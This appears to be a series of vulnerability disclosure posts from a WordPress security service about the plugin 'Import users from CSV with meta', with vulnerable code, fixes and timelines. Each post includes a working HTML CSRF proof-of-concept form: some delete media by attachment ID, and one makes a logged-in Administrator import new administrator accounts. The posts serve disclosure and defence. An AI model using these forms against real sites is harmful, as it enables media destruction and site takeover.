28 Jun 2019

Closures of Very Popular WordPress Plugins, Week of June 28

While we already are far ahead of other companies in keeping up with vulnerabilities in WordPress plugins (amazingly that isn’t an exaggeration), in looking into how we could get even better we noticed that in a recent instance where a vulnerability was exploited in a plugin, we probably could have warned our customers about the vulnerability even sooner if we had looked at the plugin when it was first closed on the Plugin Directory instead of when the vulnerability was fixed (though as far as we are aware the exploitation started after we had warned our customers of the fix). So we are now monitoring to see if any of the 1,000 most popular plugins are closed on the Plugin Directory and then checking whether it looks like the closure was due to a vulnerability.

This week one of those plugins was closed and it has been reopened.

Import users from CSV with meta

The plugin Import users from CSV with meta, which has 30,000+ installs, was closed on Saturday. While no reason has been given for the closure, it would appear it was closed due to a vulnerability we had originally notified the developer about back in September 2016.

It was reopened on Wednesday.

21 Jun 2019

Cross-Site Request Forgery (CSRF)/Media Deletion Vulnerability in Import users from CSV with meta

One of the changelog entries for the latest version of Import users from CSV with meta is “XSS problem fixed when displaying data imported thanks to lckjack who reports it”. While looking to see if there was a vulnerability related to that which we should be notifying the customers of our service about if they use that plugin, we found a vulnerability we could confirm still exists. It turns out the plugin’s functionality for deleting files uploaded through it isn’t properly secured, so an attacker could cause logged in Administrators to delete any WordPress media files without intending to.

The plugin registers the function that handles that to be accessible to anyone logged in to WordPress through its AJAX functionality:

add_action( 'wp_ajax_acui_delete_attachment', 'acui_delete_attachment' );

The function, which is located in the file /import-users-from-csv-with-meta.php, does restrict who can do the deletion to those with the “manage_options” capability that normally only Administrators have:

function acui_delete_attachment() {
	if( ! current_user_can( 'manage_options' ) )
		wp_die( __('You are not an adminstrator', 'import-users-from-csv-with-meta' ) );

	$attach_id = intval( $_POST['attach_id'] );

	$result = wp_delete_attachment( $attach_id, true );

	if( $result === false )
		echo 0;
	else
		echo 1;

	wp_die();
}

What it doesn’t include is a nonce check to prevent cross-site request forgery (CSRF), so an attacker could cause a logged in Administrator to delete an arbitrary media file handled by WordPress. Since the media is deleted based on an integer ID value, an attacker could have them send out multiple requests that iterate through every possible attachment ID and delete all of the website’s media files.

In addition to checking for a nonce, restricting which media files can be deleted (for example, only those uploaded through the plugin) would be a good idea if possible.

We are the reason that capabilities check is there

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions of installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road, the best way to find out if this vulnerability or other vulnerabilities in WordPress plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities but have failed to do that.

Proof of Concept

The following proof of concept will delete the file associated with specified attachment ID, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[attachment ID]” with the attachment ID of the media file to be deleted.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=acui_delete_attachment" method="POST">
<input type="hidden" name="attach_id" value="[attachment ID]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

18 Mar 2019

Vulnerability Details: CSRF/XSS in Import users from CSV with meta

This post provides the details of a vulnerability in the WordPress plugin Import users from CSV with meta not discovered by us, where the discoverer hadn't provided the details needed for us to confirm the vulnerability while we were adding it to the data set for our service, so its contents are limited to subscribers of our service.

If you were using our service, you would have already been warned about this vulnerability if your website is vulnerable due to it. You can try out our service for free and then see the details of the vulnerability.

For existing customers, please log in to your account to view the contents of the post.

2 Sep 2016

Authenticated Media Deletion Vulnerability in Import users from CSV with meta

One frequent source of security issues being discovered these days is a lack of proper restrictions on who can access functions that are made accessible through WordPress’ AJAX functionality. By default, those functions (registered with the wp_ajax_ prefix) are accessible to anyone who is logged in to WordPress, even though they are often intended to be accessible only to high level users. For many websites where there is only a single Administrator account or a small number of trusted users these vulnerabilities don’t pose a risk, but for plugins that are intended to be used in environments where that isn’t the case it is more of a concern. One such plugin is Import users from CSV with meta, which allows for importing thousands of users quickly.

As of version 1.9.4.6, the plugin made the function acui_delete_attachment() available through the AJAX functionality in the file /import-users-from-csv-with-meta.php here:

add_action( 'wp_ajax_acui_delete_attachment', 'acui_delete_attachment' );

While the function looks to be intended only for Administrators, there was no check done as to who is making the request:

function acui_delete_attachment() {
	$attach_id = intval( $_POST['attach_id'] );

	$result = wp_delete_attachment( $attach_id, true );

	if( $result === false )
		echo 0;
	else
		echo 1;

	wp_die();
}

There also is no protection against cross-site request forgery (CSRF) in that function.

The function calls wp_delete_attachment() with its second parameter set to true, which causes the media file associated with the attachment to be deleted as well as the metadata associated with the attachment. Someone could iterate through all possible attachment IDs to delete all of the media files on the website.

After we notified the developer of the issue, version 1.9.5 was released, which added code that causes the rest of the function not to run if the request comes from a non-Administrator level user:

function acui_delete_attachment() {
        if( ! current_user_can( 'manage_options' ) )
                wp_die( "You are not an adminstrator" );

That restricts lower level users from doing deletions, but the cross-site request forgery (CSRF) issue still exists.
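For comparison, here is how that handler looks with all three controls in place: the capability check that version 1.9.5 added, the nonce check that the 2016 and 2019 posts note is still missing, and the restriction on which files may be deleted that the 2019 post suggests. This is an added example and not the plugin’s code. The example_ function names, the tools_page_example-import hook suffix and the _example_imported_by_csv post meta marker are assumptions made for illustration; the WordPress functions called are real core APIs.

```php
<?php
// Added example, not the plugin's own code. The example_* names, the
// 'tools_page_example-import' hook suffix and the '_example_imported_by_csv'
// meta key are assumptions; the WordPress functions called are real core APIs.

// Only the "wp_ajax_" hook is registered, so the handler is reachable by
// logged-in users only; the checks inside decide which of them may delete.
add_action( 'wp_ajax_example_delete_attachment', 'example_delete_attachment' );

// Hand the admin page's script a nonce tied to this one action. The script
// then posts { action: 'example_delete_attachment', nonce: exampleDelete.nonce,
// attach_id: <id> } to exampleDelete.ajaxUrl.
add_action( 'admin_enqueue_scripts', 'example_enqueue_delete_script' );
function example_enqueue_delete_script( $hook_suffix ) {
	if ( 'tools_page_example-import' !== $hook_suffix ) {
		return;
	}
	wp_enqueue_script( 'example-delete', plugins_url( 'delete.js', __FILE__ ), array( 'jquery' ), '1.0', true );
	wp_localize_script( 'example-delete', 'exampleDelete', array(
		'ajaxUrl' => admin_url( 'admin-ajax.php' ),
		'nonce'   => wp_create_nonce( 'example_delete_attachment' ),
	) );
}

// Call this when the plugin itself stores an uploaded file, so the delete
// handler can later tell the plugin's own attachments from everything else.
function example_mark_imported( $attach_id ) {
	update_post_meta( $attach_id, '_example_imported_by_csv', 1 );
}

function example_delete_attachment() {
	// 1. Capability check: blocks lower-privileged logged-in users (the
	//    check version 1.9.5 added).
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'insufficient privileges', 403 );
	}

	// 2. Nonce check: blocks CSRF. A forged cross-site form cannot carry a
	//    valid nonce, so check_ajax_referer() dies with -1 before anything runs.
	check_ajax_referer( 'example_delete_attachment', 'nonce' );

	// 3. Scope check: accept only a real attachment that this plugin uploaded,
	//    so a valid admin session cannot be used to iterate IDs and wipe the
	//    whole media library.
	$attach_id = isset( $_POST['attach_id'] ) ? absint( $_POST['attach_id'] ) : 0;
	if ( 0 === $attach_id || 'attachment' !== get_post_type( $attach_id ) ) {
		wp_send_json_error( 'not an attachment', 400 );
	}
	if ( ! get_post_meta( $attach_id, '_example_imported_by_csv', true ) ) {
		wp_send_json_error( 'attachment was not uploaded by this plugin', 403 );
	}

	// Second argument true removes the file on disk as well as the post row.
	if ( false === wp_delete_attachment( $attach_id, true ) ) {
		wp_send_json_error( 'delete failed', 500 );
	}
	wp_send_json_success( array( 'deleted' => $attach_id ) );
}
```

The order matters: the capability check and nonce check both run before the request parameter is even read, and the scope check means that even a legitimate Administrator clicking through the plugin’s own interface can only remove files the plugin put there, which also limits the damage if a nonce were ever leaked.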

Proof of Concept

The following proof of concept will delete the file associated with specified attachment ID, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[attachment ID]” with the attachment ID of the media file to be deleted.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=acui_delete_attachment" method="POST">
<input type="hidden" name="attach_id" value="[attachment ID]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 8/22/2016 – Developer notified.
  • 8/30/2016 – Version 1.9.5 released, which fixes the missing capabilities check (the CSRF issue remained).

2 Sep 2016

Cross-Site Request Forgery (CSRF)/User Import Vulnerability in Import users from CSV with meta

Recently we have been taking a quick look over plugins that handle importing users into WordPress for security issues, since their functionality could be useful to hackers.

In looking over the Import users from CSV with meta plugin we found that as of version 1.9.4.6 the plugin did not include protection against cross-site request forgery (CSRF) for requests to import users. So if you could get a logged in Administrator to access a page you control, you could cause them to create new users with the Administrator role that you could then log in as.

The import is handled through the page /wp-admin/tools.php?page=acui, which is set up with the following line of code in the file /import-users-from-csv-with-meta/trunk/import-users-from-csv-with-meta.php:

add_submenu_page( 'tools.php', 'Insert users massively (CSV)', 'Import users from CSV', 'create_users', 'acui', 'acui_options' );

That calls the function acui_options() in the file /importer.php to generate the page. The user import is handled through the function acui_fileupload_process(). The code in acui_options() that runs before that checks whether the user has the “create_users” capability (which normally only Administrators have), but as of version 1.9.4.6 didn’t check for a nonce:

function acui_options() 
{
	global $url_plugin;

	if ( !current_user_can('create_users') ) {
		wp_die(__('You are not allowed to see this content.'));
	}

	if ( isset ( $_GET['tab'] ) ) 
		$tab = $_GET['tab'];
   	else 
   		$tab = 'homepage';


	if( isset( $_POST ) && !empty( $_POST ) ):
		switch ( $tab ){
      		case 'homepage':
      			acui_fileupload_process( $_POST, false );

The function acui_fileupload_process() also doesn’t check for a nonce.

After we notified the developer of the issue, version 1.9.5 was released, which adds a nonce to the relevant page and checks to make sure a valid one is included when importing users:

function acui_fileupload_process( $form_data, $is_cron = false ) {
  if ( ! isset( $_POST['acui-nonce'] ) || ! wp_verify_nonce( $_POST['acui-nonce'], 'acui-import' ) ) {
        wp_die( 'Nonce problem' );
  }
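The same pattern applied to a complete import page, as an added example rather than the plugin’s own code: the nonce is written into the form with wp_nonce_field() and verified with check_admin_referer() before any user is created, and the requested role is checked against the roles the current user is actually allowed to assign, so a forged form cannot smuggle in role[]=administrator. The example_ function names, the example-import page slug, the form field names and the two-column CSV layout (username,email) are assumptions made for illustration; the WordPress functions called are real core APIs.

```php
<?php
// Added example, not the plugin's own code. The example_* names, the
// 'example-import' slug, the field names and the "username,email" CSV
// layout are assumptions; the WordPress functions called are real core APIs.

add_action( 'admin_menu', function () {
	// 'create_users' gates who can open the page; it is not CSRF protection,
	// because the victim in a CSRF attack already has that capability.
	add_submenu_page( 'tools.php', 'Example user import', 'Example user import',
		'create_users', 'example-import', 'example_import_page' );
} );

function example_import_page() {
	if ( ! current_user_can( 'create_users' ) ) {
		wp_die( 'You are not allowed to see this content.' );
	}

	if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
		example_import_process();
	}
	?>
	<form method="post" enctype="multipart/form-data">
		<?php
		// Hidden field bound to this action and the current session; a page on
		// the attacker's site cannot read or guess it.
		wp_nonce_field( 'example-import', 'example-nonce' );
		?>
		<input type="file" name="users_csv" />
		<select name="role"><?php wp_dropdown_roles( 'subscriber' ); ?></select>
		<?php submit_button( 'Import' ); ?>
	</form>
	<?php
}

function example_import_process() {
	// Rejects the cross-site form from the proof of concept: it carries no
	// nonce, and check_admin_referer() dies before any user is created.
	check_admin_referer( 'example-import', 'example-nonce' );

	// Only hand out roles the current user is permitted to assign.
	$role = isset( $_POST['role'] ) ? sanitize_key( $_POST['role'] ) : 'subscriber';
	if ( ! array_key_exists( $role, get_editable_roles() ) ) {
		wp_die( 'Invalid role' );
	}

	if ( empty( $_FILES['users_csv']['tmp_name'] ) || UPLOAD_ERR_OK !== $_FILES['users_csv']['error'] ) {
		wp_die( 'No CSV uploaded' );
	}

	$fh = fopen( $_FILES['users_csv']['tmp_name'], 'r' );
	while ( ( $row = fgetcsv( $fh ) ) !== false ) {
		// Assumed column order: username,email
		list( $login, $email ) = array_pad( $row, 2, '' );
		$login = sanitize_user( $login, true );
		$email = sanitize_email( $email );
		if ( '' === $login || ! is_email( $email ) || username_exists( $login ) ) {
			continue;
		}
		$user_id = wp_insert_user( array(
			'user_login' => $login,
			'user_email' => $email,
			'user_pass'  => wp_generate_password( 24 ),
			'role'       => $role,
		) );
		if ( ! is_wp_error( $user_id ) ) {
			// Let the new user set their own password instead of shipping one in the CSV.
			wp_new_user_notification( $user_id, null, 'user' );
		}
	}
	fclose( $fh );
	echo '<div class="updated"><p>Import finished.</p></div>';
}
```

check_admin_referer() is the admin-page counterpart of check_ajax_referer(): it verifies the named nonce field and stops the request with an “are you sure” page if it is missing or invalid, which is exactly what the proof of concept below relies on not happening.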

Proof of Concept

The following proof of concept will cause users included in the uploaded CSV file to be added as Administrators, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress. The plugin comes with a sample CSV file named test.csv, which can be used when testing the proof of concept.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=acui" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role[]" value="administrator" />
<input type="file" name="uploadfiles[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 8/22/2016 – Developer notified.
  • 8/30/2016 – Version 1.9.5 released, which fixes the issue.